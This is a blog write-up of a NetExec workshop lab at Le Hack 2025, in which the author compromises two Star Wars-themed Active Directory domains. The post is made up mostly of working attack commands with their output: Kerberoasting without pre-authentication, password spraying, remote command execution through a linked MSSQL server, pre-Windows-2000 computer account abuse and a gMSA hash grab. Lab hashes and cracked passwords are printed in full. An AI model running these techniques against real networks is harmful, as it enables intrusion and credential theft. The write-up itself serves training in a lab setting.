Le Hack 2025 - NetExec Workshop 🕷️ // ledrypotato

Context

Every year Le Hack takes place in Paris. This cybersecurity event offers talks and workshops in loads of different fields.

This year again @mpgn_x64 (Martial Puygrenier), @wil_fri3d (Wilfried BÉCARD) and @_zblurx (Thomas Seigneuret) organized a NetExec workshop. I was lucky enough to attend it last year as well but only managed to compromise 1 of the 2 Active Directory domains 😔…

This year my objective was to compromise both domains 😁!

The goal of this workshop is to use exclusively NetExec to compromise 2 Active Directory domains, this year’s theme is Star Wars 🚀💫!

Discovery & Enumeration

We know that we are on the 10.0.0.0/24 network, let’s start scanning!

We can create a file called proto.txt that contains all the different protocols that are implemented in NetExec:

ssh
mssql
smb
winrm
nfs
wmi
ldap
vnc
ftp
rdp

Then loop over them to see what services are open/responding to us:

for i in $(cat proto.txt); do nxc $i targets.txt --log nxc/all-proto.txt;done
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
MSSQL       10.0.0.8        1433   DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
SMB         10.0.0.6        445    MUSTAFAR         [*] Windows Server 2022 Build 20348 x64 (name:MUSTAFAR) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    coruscant        [*] Windows Server 2022 Build 20348 x64 (name:coruscant) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.7        445    jedha            [*] Windows Server 2022 Build 20348 x64 (name:jedha) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:rebels.local) (signing:True) (SMBv1:False)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
WINRM       10.0.0.5        5985   coruscant        [*] Windows Server 2022 Build 20348 (name:coruscant) (domain:empire.local)
WINRM       10.0.0.6        5985   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
WINRM       10.0.0.7        5985   jedha            [*] Windows Server 2022 Build 20348 (name:jedha) (domain:rebels.local)
WINRM       10.0.0.8        5985   DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
RPC         10.0.0.7        135    jedha            [*] Windows Server 2022 Build 20348 (name:jedha) (domain:rebels.local)
RPC         10.0.0.6        135    MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
RPC         10.0.0.5        135    coruscant        [*] Windows Server 2022 Build 20348 (name:coruscant) (domain:empire.local)
RPC         10.0.0.8        135    DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
LDAP        10.0.0.5        389    CORUSCANT        [*] Windows Server 2022 Build 20348 (name:CORUSCANT) (domain:empire.local) (signing:None) (channel binding:No TLS cert)
LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
RDP         10.0.0.5        3389   coruscant        [*] Windows 10 or Windows Server 2016 Build 20348 (name:coruscant) (domain:empire.local) (nla:True)
RDP         10.0.0.8        3389   DANTOOINE        [*] Windows 10 or Windows Server 2016 Build 20348 (name:DANTOOINE) (domain:rebels.local) (nla:True)
RDP         10.0.0.7        3389   jedha            [*] Windows 10 or Windows Server 2016 Build 20348 (name:jedha) (domain:rebels.local) (nla:True)
RDP         10.0.0.6        3389   MUSTAFAR         [*] Windows 10 or Windows Server 2016 Build 20348 (name:MUSTAFAR) (domain:empire.local) (nla:False)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

We know that there are 4 machines with the following ports open:

Machine	IP	Open ports
coruscant	10.0.0.5	135, 389, 445, 3389, 5985
MUSTAFAR	10.0.0.6	135, 445, 1433, 3389, 5985
jedha	10.0.0.7	135, 389, 445, 3389, 5985
DANTOOINE	10.0.0.8	135, 445, 1433, 3389, 5985

The 4 machine names correspond to planet names in Star Wars, this will come in handy later on.

Setup - `/etc/hosts`

We can generate a hosts file with the --generate-hosts-file flag:

nxc smb targets.txt --generate-hosts-file hosts

Then append them to /etc/hosts:

10.0.0.5 coruscant coruscant.empire.local empire.local
10.0.0.6 MUSTAFAR MUSTAFAR.empire.local
10.0.0.7 jedha jedha.rebels.local rebels.local
10.0.0.8 DANTOOINE DANTOOINE.rebels.local

RDP - `(nla:False)`

Something interesting stands out on the RDP protocol:

There is no NLA (Network Level Authentication) on the MUSTAFAR machine.

Network Level Authentication (NLA)

“Network Level Authentication (NLA) adds an extra layer of security to Remote Desktop connections. With NLA enabled, users must authenticate themselves before a remote session is established.” - Microsoft documentation

Knowing this we can use the --nla-screenshot flag to capture the contents of the screen:

nxc rdp targets.txt -u 'a' -p '' --nla-screenshot
RDP         10.0.0.5        3389   coruscant        [*] Windows 10 or Windows Server 2016 Build 20348 (name:coruscant) (domain:empire.local) (nla:True)
RDP         10.0.0.7        3389   jedha            [*] Windows 10 or Windows Server 2016 Build 20348 (name:jedha) (domain:rebels.local) (nla:True)
RDP         10.0.0.8        3389   DANTOOINE        [*] Windows 10 or Windows Server 2016 Build 20348 (name:DANTOOINE) (domain:rebels.local) (nla:True)
RDP         10.0.0.5        3389   coruscant        [-] empire.local\a: (STATUS_LOGON_FAILURE)
RDP         10.0.0.7        3389   jedha            [-] rebels.local\a: (STATUS_LOGON_FAILURE)
RDP         10.0.0.6        3389   MUSTAFAR         [*] Windows 10 or Windows Server 2016 Build 20348 (name:MUSTAFAR) (domain:empire.local) (nla:False)
RDP         10.0.0.8        3389   DANTOOINE        [-] rebels.local\a: (STATUS_LOGON_FAILURE)
RDP         10.0.0.6        3389   MUSTAFAR         [-] empire.local\a: (STATUS_LOGON_FAILURE)
RDP         10.0.0.6        3389   MUSTAFAR         NLA Screenshot saved /root/.nxc/screenshots/MUSTAFAR_10.0.0.6_2025-06-28_211116.png

From which we get 2 usernames:

Let’s create a file called in users/real.txt with our 2 known usernames:

grievousssssss
krennic

AS-REP Roasting & Kerberoasting (without pre-authentication)

A recent PR adding the --no-preauth-targets flag was merged and made me check this path out first.

We can check for common vulnerabilities on these accounts like Kerberoasting (without pre-authentication) and AS-REP Roasting since we have 2 valid usernames.

Note

The grievousssssss account is vulnerable to AS-REP Roasting but the password does not crack with rockyou.txt.

What about Kerberoasting without pre-authentication? It works!

nxc ldap targets.txt -u 'users/real.txt' -p '' --no-preauth-targets users/real.txt --kerberoasting kerberoasting                                                                                    
LDAP        10.0.0.5        389    CORUSCANT        [*] Windows Server 2022 Build 20348 (name:CORUSCANT) (domain:empire.local) (signing:None) (channel binding:No TLS cert)
LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
LDAP        10.0.0.5        389    CORUSCANT        [+] empire.local\grievousssssss account vulnerable to asreproast attack
LDAP        10.0.0.7        389    JEDHA            [-] rebels.local\grievousssssss: KDC_ERR_C_PRINCIPAL_UNKNOWN
LDAP        10.0.0.7        389    JEDHA            [-] rebels.local\krennic: KDC_ERR_C_PRINCIPAL_UNKNOWN
LDAP        10.0.0.5        389    CORUSCANT        [*] Total of records returned 1
LDAP        10.0.0.5        389    CORUSCANT        $krb5tgs$23*krennic$EMPIRE.LOCAL$krennic*$63ece4853bcd11f09a36146c1bc1ae7f$37c8e639506bd49f809cd1d4414e881f29b822d705f2954b5650a8481f920e4d1dfea2305193c92b2e47
71c5b7cb7a539aeeaf9e1f534ae0ec1f0db1e801ccc78de4f91a953f7529ac121cb100ba735365f06afd5cb2e6e6c0f63679212e3aeed7014ee72d2fab3573febf901fc5d4fa06abae2468f3d691c5ea221626cdedfa693ea1da9603519f5dbc326d745dda32ca090a2
3b3026cea81ff0172fa4996a552d4a916150d9dc15883fbe4ad37a33c07010416cbb105cab76429209ac521c6aad203dfc958eec4ff3df738f268c67bb68e38ef1659e1a33c70ab4931982df465e78ca7344fceb88bf2125fe4295b1a92700a6f97c2c3535cabee4dd5
d406c60cabd1f825a91efb3e1f3e245fcdde6b415db6db8ec3e80297de4b7bc95500da9c3ada1cd7006c270176298a00f7b6ae6be6f370bd14f1cb9a46abef26d581a808ac2356708aadca9b5dc05c4dbde8b3d9c425845da6431dcf4caa492cbd89bd047683650f5cb
7c9cf2b474cebe9652e31b98b7aa81a356b599aba236dc7ea114adef1850dc72c3c74f2c42efe3456f45b2dad6a2b9cd7bd7d2f269b1f960a72dd94062b9b7d53ff2112a09a692e7e2a888e56e475e926a868991cb8f5e11a48e1f4c108d94763409bb814eafc97403e
f04bf55a6defa3b509f2ec43c17de5439e36fbb4d5574a4478f8193ff4e733170ebcdaf4f7cbf2c015894f64f6e571265313723c42f0b83b8fb75824e17593d11ad57fe85a32371e608f59d847e4b40301db0576db90590c793879ac6ef31c381e38c9edfe8dca1dd6c
4805faa7d534a81d777a1a585f1648644c7b6ac1413703c536e6caf6864e6140a81b19f22287ea0c2b2877555c46baf7c79b549f25cf1e2f304c9cf39d965c6373e37175d8f43e2a0e9cfff1b1ca43c5704d8c25536b0ec57897d6af3c480f987cc4dde65673a235a7b
2ab58b581aed1abfea95fffe25bbe9384816274a4c48c66dc16f596fe5c7e7142a75418d7d64e99a024634b56c271c3ffbe2f8941aa099baa55738ec0f90af389ed22f808980fba914bff5b34c677fecf48212ccb94321b2ec3f761c981df4a63e137f551670f6f84d7
e9e9043b639c9b595b730fddf03649983c3ca9c6da17ec3af8c1bc4c31916cd8f1c2da90f2974368cbaa61bf8c32ca06d88b5c66861d23412f98dde9ee59ec98d6d99280463d1ffefc69e2c7813c506a2034598c974beb9b6c321092110a9e98e3b56bb57e63b8f13a6
5daa32285294fb49fae3e51e3eb8837cceb0d433726a98f9ce02851add8bb403a7047a75c3a90ef347ee5e695e7c94c6a16b79b71d7d02e8ff5fd467e5e42528c65ece77dd5c95c8af2d6e75a0ee04914a48409e4eed3551588d9ba8c96f6cf3e73cb13964c24df7cd5
cfc2aa2b17e78fbef21b822f63e21022a84411d3ed13eae2948d77ab506ac33133cb2fc5b4d8afb5b774a3fd6ff8c880bff3b4966aaa91975542ebd0c8873bc03bc07b687ae83ce39624cb5133a94a52e32b77647f320a50025b63db4d387c390e13dc9fae9be8a0d00
17d1d35512594342c3d2ebe3834ffcb56a92

Check both vulnerabilities at once

We can check for Kerberoasting (without pre-authentication) and AS-REP Roasting in the same command.

nxc ldap targets.txt -u 'users/real.txt' -p '' --no-preauth-targets users/real.txt --kerberoasting kerberoasting --asreproast asreproast

We can attempt to crack it with hashcat:

hashcat --hash-type 13100 --attack-mode 0 kerberoasting  /opt/lists/rockyou.txt

This time it cracks and we get our first set of credentials!

Credentials 🔑 - `krennic`

krennic:liu8Sith

Domain 1 - `empire.local`

Now that we have valid credentials in the empire.local domain we can do several things:

Dump LDAP information with --bloodhound
Enumerate users with --users then spray our password on them
Try and authenticate over different protocols with our set of credentials
Enumerate SMB shares
Run NetExec SMB modules
etc.

Let’s start with BloodHound so that runs in the background:

nxc ldap scope/dc.txt -u krennic -p liu8Sith -d empire.local --dns-server 10.0.0.5 --bloodhound -c all

Then move on to creating a list of usernames:

nxc smb 10.0.0.6 -u 'krennic' -p 'liu8Sith' --users --log nxc/user-dump.txt
awk '{print $5}' nxc/user-dump.txt > users/empire-all.txt

Password spraying yields nothing:

nxc smb targets.txt -u 'users/empire-all.txt' -p 'liu8Sith' --continue-on-success

Nor do we have any interesting shares to read a part from IPC$ that allows us to RID brute force some more local usernames on MUSTAFAR:

nxc smb targets.txt -u 'users/empire-all.txt' -p 'liu8Sith' --shares

nxc smb 10.0.0.6 -u 'krennic' -p 'liu8Sith' --rid-brute
SMB         10.0.0.6        445    MUSTAFAR         [*] Windows Server 2022 Build 20348 x64 (name:MUSTAFAR) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.6        445    MUSTAFAR         [+] empire.local\krennic:liu8Sith 
SMB         10.0.0.6        445    MUSTAFAR         500: mustafar\localadmin (SidTypeUser)
SMB         10.0.0.6        445    MUSTAFAR         501: mustafar\Guest (SidTypeUser)
SMB         10.0.0.6        445    MUSTAFAR         503: mustafar\DefaultAccount (SidTypeUser)
SMB         10.0.0.6        445    MUSTAFAR         504: mustafar\WDAGUtilityAccount (SidTypeUser)
SMB         10.0.0.6        445    MUSTAFAR         513: mustafar\None (SidTypeGroup)
SMB         10.0.0.6        445    MUSTAFAR         1000: mustafar\SQLServer2005SQLBrowserUser$MUSTAFAR (SidTypeAlias)

Note

I also tried several SMB modules like gpp_autologin, gpp_password, etc. but no luck there.

Let’s try and connect with other protocols, starting by MSSQL since we saw that was open earlier:

nxc mssql targets.txt -u krennic -p liu8Sith --continue-on-success             
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.8        1433   DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] empire.local\krennic:liu8Sith

We can successfully authenticate to the MSSQL server on MUSTAFAR (10.0.0.6) with our credentials.

MSSQL enumeration on `MUSTAFAR`

We can run basic SQL queries with the -q flag:

nxc mssql 10.0.0.6 -u krennic -p liu8Sith -q 'select @@version'      
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] empire.local\krennic:liu8Sith
MSSQL       10.0.0.6        1433   MUSTAFAR         Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
    Oct  8 2022 05:58:25 
    Copyright (C) 2022 Microsoft Corporation
    Express Edition (64-bit) on Windows Server 2022 Datacenter Azure Edition 10.0 <X64> (Build 20348: ) (Hypervisor)

We can enumerate logins and see the droideka user:

nxc mssql 10.0.0.6 -u krennic -p liu8Sith -M enum_logins
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] empire.local\krennic:liu8Sith
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         [*] Enumerated logins
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         Login Name                          Type            Status
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         ----------                          ----            ------
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         EMPIRE\krennic                      Domain User     ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         mustafar\localadmin                 Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         NT AUTHORITY\SYSTEM                 Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         NT Service\MSSQL$SQLEXPRESS         Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         NT SERVICE\SQLTELEMETRY$SQLEXPRESS  Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         NT SERVICE\SQLWriter                Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         NT SERVICE\Winmgmt                  Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         droideka                            SQL User        ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         sa                                  SQL User        DISABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         BUILTIN\Users                       Windows Group   ENABLED

There are no linked servers…

nxc mssql 10.0.0.6 -u krennic -p liu8Sith -M enum_links
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] empire.local\krennic:liu8Sith 
ENUM_LINKS  10.0.0.6        1433   MUSTAFAR         [+] Linked servers found:
ENUM_LINKS  10.0.0.6        1433   MUSTAFAR         [*]   - mustafar\SQLEXPRESS

We can try and enable xp_cmdshell:

nxc mssql 10.0.0.6 -u krennic -p liu8Sith -M enable_cmdshell -o ACTION=enable
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] empire.local\krennic:liu8Sith
ENABLE_C... 10.0.0.6        1433   MUSTAFAR         [+] xp_cmdshell successfully enabled.

NetExec says that the xp_cmdshell was successfully enabled but we can’t actually execute any commands with -x <CMD> with our without --local-auth 🤔 (I’ll have to look into the module’s code to see what’s going on):

nxc mssql 10.0.0.6 -u krennic -p liu8Sith --local-auth -x whoami
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [-] MUSTAFAR\krennic:liu8Sith (Login failed for user 'krennic'. Please try again with or without '--local-auth)

I ended up wasting almost an hour at this stage since I was convinced that it was the path 😔.

BloodHound Analysis 🐶

Back to the BloodHound ingest that we did earlier we can see an interesting path for later on, fn2187 can ForceChangePassword over vader who is a Domain Administrator in empire.local:

Bad Successor?

Another recent module implemented by @mpgn is the BadSuccessor module based on this recent blog post by Akamai. Him and @CravateRouge talk about the exploit more in detail in his latest podcast if you’re interested.

Even though we can’t exploit it directly with NetExec I was curious to just try it out and enumerate dMSA objects:

nxc ldap 10.0.0.5 -u 'krennic' -p 'liu8Sith' -M badsuccessor
LDAP        10.0.0.5        389    CORUSCANT        [*] Windows Server 2022 Build 20348 (name:CORUSCANT) (domain:empire.local) (signing:None) (channel binding:No TLS cert)
LDAP        10.0.0.5        389    CORUSCANT        [+] empire.local\krennic:liu8Sith 
BADSUCCE... 10.0.0.5        389    CORUSCANT        [-] No domain controller with operating system Windows Server 2025 found, attack not possible. Enumerate dMSA objects anyway.
BADSUCCE... 10.0.0.5        389    CORUSCANT        [+] Found 1 results
BADSUCCE... 10.0.0.5        389    CORUSCANT        vader (S-1-5-21-2236031427-1663051459-2826524466-1601), OU=Domain Controllers,DC=empire,DC=local

vader shows up as a dMSA object but there are no Windows Servers 2025 so we can’t exploit this further.

Back to MSSQL on `MUSTAFAR`

Back to the users that we enumerated earlier with the enum_logins module, we can try some basic password spraying.

We can try username=password for the local user we saw earlier in the database:

nxc mssql scope/sql.txt -u 'droideka' -p 'droideka' --local-auth
MSSQL       10.0.0.8        1433   DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.8        1433   DANTOOINE        [-] DANTOOINE\droideka:droideka (Login failed for user 'droideka'. Please try again with or without '--local-auth')
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka

It works!

Credentials 🔑 - `droideka`

droideka:droideka

Enumerating MSSQL Links

Once again we can enumerate links since this user may have different permissions:

nxc mssql scope/sql.txt -u 'droideka' -p 'droideka' --local-auth -M enum_links
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.8        1433   DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka 
ENUM_LINKS  10.0.0.6        1433   MUSTAFAR         [+] Linked servers found:
ENUM_LINKS  10.0.0.6        1433   MUSTAFAR         [*]   - DANTOOINE\SQLEXPRESS
ENUM_LINKS  10.0.0.6        1433   MUSTAFAR         [*]   - mustafar\SQLEXPRESS
MSSQL       10.0.0.8        1433   DANTOOINE        [-] DANTOOINE\droideka:droideka (Login failed for user 'droideka'. Please try again with or without '--local-auth')

Executing Commands on a Linked MSSQL Server

We are able to execute commands on the remote server directly, perhaps someone already enabled xp_cmdshell with the link_enable_cmdshell module 😆!

nxc mssql 10.0.0.6 -u 'droideka' -p 'droideka' --local-auth -M link_xpcmd -o 'LINKED_SERVER=DANTOOINE\SQLEXPRESS' CMD='whoami'
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka 
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [*] Running command on DANTOOINE\SQLEXPRESS: whoami
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [+] Executed command via linked server
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         nt service\mssql$sqlexpress

We have the SeImpersonatePrivilege which would be the classic way of elevating privileges but I don’t know of a way to do that with NetExec:

nxc mssql 10.0.0.6 -u 'droideka' -p 'droideka' --local-auth -M link_xpcmd -o 'LINKED_SERVER=DANTOOINE\SQLEXPRESS' CMD='whoami /priv'
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [*] Running command on DANTOOINE\SQLEXPRESS: whoami /priv
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [+] Executed command via linked server
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         PRIVILEGES INFORMATION
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         ----------------------
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         Privilege Name                Description                               State
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         ============================= ========================================= ========
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeImpersonatePrivilege        Impersonate a client after authentication Enabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeCreateGlobalPrivilege       Create global objects                     Enabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We can instead start by reading the root directory (C:/) and discover a directory called rebels_plan containing a plans.txt file, let’s check it’s contents:

nxc mssql 10.0.0.6 -u 'droideka' -p 'droideka' --local-auth -M link_xpcmd -o 'LINKED_SERVER=DANTOOINE\SQLEXPRESS' CMD='powershell -c cat /rebels_plan/plans.txt'
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka 
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [*] Running command on DANTOOINE\SQLEXPRESS: powershell -c cat /rebels_plan/plans.txt
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [+] Executed command via linked server
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         Our next base is located in a place called "endor", this is a top secret information !

If we remember from earlier every machine has the name of a planet we can suppose that endor is referencing another machine? More on this just after.

We can enumerate users in the other domain:

nxc mssql 10.0.0.6 -u 'droideka' -p 'droideka' --local-auth -M link_xpcmd -o 'LINKED_SERVER=DANTOOINE\SQLEXPRESS' CMD='powershell -c net users /domain'
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [*] Running command on DANTOOINE\SQLEXPRESS: powershell -c net users /domain
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [+] Executed command via linked server
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         The request will be processed at a domain controller for domain rebels.local.
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         User accounts for \\jedha.rebels.local
-------------------------------------------------------------------------------
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         administrator            baze                     biggs
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         bodhi                    cassian                  chirrut
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         ezra                     finn                     Guest
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         han                      hera                     jyn
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         krbtgt                   lando                    leia
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         luke                     maz                      mon
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         obiwan                   poe                      rey
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         sabine                   wedge
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         The command completed successfully.

With the list of users I sprayed the passwords that we have as well as username=password but nothing 😔

I was pretty stuck at this point so asked Wilfried for a hint. He asked me if I saw that the machines had names of planets which I did. So endor could be another machine and asked me if I knew any common attacks on machines.

I immediately thought of pre2k accounts. We can try that!

Pre-Created Computer Accounts - Pre2k

I recommend reading this article by TrustedSec if you are unfamiliar with Pre-Created Computer Accounts.

Tldr

When the “Assign this computer account as a pre-Windows 2000 computer” checkbox is selected when creating a computer object it sets the machine’s password to the name of the machine in lowercase without the trailing $ character.

For example if we create a machine account FS01$ with the checkbox ticked the password would be set to fs01.

As you can see by the timestamp of the next command this is 45 minutes later, I lost a lot of time on this next stupid mistake 😆!

We can check if this account works by specifying the name of the machine account as the username and the password being the name of the machine account in lowercase without the trailing $ like so:

nxc ldap 10.0.0.7 -u ENDOR$ -p endor -d rebels.local

But it fails… I was confused at this point because I was used to seeing the STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT error message but that message only shows if the account has not been used yet and since I was running late someone must have beat me to it (or the account already logged in when the lab was setup).

Warning

Remember to specify -k for Kerberos authentication (https://x.com/filip_dragovic/status/1524730451826511872) ! Thanks to Wilfried again for the hint 😉!

We now have an account in the rebels.local domain:

Credentials 🔑 - `endor`

endor$:endor

Domain 2 - `rebels.local`

Now that we have an account in this domain we can run the BloodHound ingestor again:

nxc ldap 10.0.0.7 -u ENDOR$ -p endor -d rebels.local -k --dns-server 10.0.0.7 --bloodhound -c all
LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
LDAP        10.0.0.7        389    JEDHA            [+] rebels.local\ENDOR$:endor
LDAP        10.0.0.7        389    JEDHA            Resolved collection methods: localadmin, psremote, container, objectprops, group, rdp, dcom, session, acl, trusts
LDAP        10.0.0.7        389    JEDHA            Using kerberos auth without ccache, getting TGT
LDAP        10.0.0.7        389    JEDHA            Done in 0M 3S
LDAP        10.0.0.7        389    JEDHA            Compressing output into /root/.nxc/logs/JEDHA_10.0.0.7_2025-06-28_234649_bloodhound.zip

We can list the computers to see if there are any more pre2k accounts that are vulnerable, but nothing there…

Group Managed Service Account (gMSA)

There is an interesting computer name containing gMSA:

nxc ldap 10.0.0.7 -u ENDOR$ -p endor -d rebels.local -k --computers
LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
LDAP        10.0.0.7        389    JEDHA            [+] rebels.local\ENDOR$:endor 
LDAP        10.0.0.7        389    JEDHA            [*] Total records returned: 4
LDAP        10.0.0.7        389    JEDHA            jedha$
LDAP        10.0.0.7        389    JEDHA            dantooine$
LDAP        10.0.0.7        389    JEDHA            endor$
LDAP        10.0.0.7        389    JEDHA            gMSA-scarif$

Let’s blindly try and retrieve it’s NT hash with the --gmsa flag as endor since time is pressing ⌛:

nxc ldap 10.0.0.7 -u ENDOR$ -p endor -d rebels.local -k --gmsa
